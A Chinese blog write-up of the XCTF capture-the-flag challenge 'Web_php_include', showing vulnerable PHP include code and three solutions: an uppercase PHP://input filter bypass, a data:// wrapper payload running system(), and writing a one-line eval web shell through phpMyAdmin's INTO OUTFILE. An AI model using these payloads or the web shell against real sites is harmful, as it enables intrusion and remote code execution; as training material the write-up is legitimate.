php include文件包含

XCTF题目:Web_php_include

<?php
show_source(__FILE__);//高亮显示源文件
echo $_GET['hello'];
$page=$_GET['page']; //获取表单‘page’的值
while (strstr($page, "php://")) {  
    $page=str_replace("php://", "", $page);
}
include($page);//include()函数用于将函数内调用的文件内的所有内容(文本)复制到调用它的文件中;
?>


//strstr($page, "php://") 中如果page的值中没有出现"php://",那么不进入循环(循环的意思是将page中含有"php://"的替换为空格)

 

第一种方法:

关于str_repalce函数的绕过:这个函数是区分大小写的,所以只要使用大写就能绕过

接着使用PHP://input配合post来传递恶意代码

 

得知flag文件后读取文件即可得到flag

 

 

 

 

第二种方法(data://伪协议执行命令利用)

 

既然过滤了php://的伪协议 我们可以使用其他协议来做这里使用data://伪协议

data://伪协议

php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码

使用方法:data://text/plain;base64,xxxx(base64编码后的数据)

<?php system("cat fl4gisisish3r3.php")?>

 

 

 

 

 

 

 

第三种方法(数据库写入马)

御剑扫描获得phpmyadmin root 密码空 进入

数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据 如果是null不能写

SHOW VARIABLES LIKE "secure_file_priv"

linux默认tmp是可写目录 试试写入一句话马 菜刀连接 

SELECT "<?php eval(@$_POST['xiaohua']); ?>"
INTO OUTFILE '/tmp/test1.php'

 

参考:https://www.cnblogs.com/xhds/p/12218471.html

posted @ 2020-10-14 19:20  LuoSpider  阅读(1360)  评论(0编辑  收藏  举报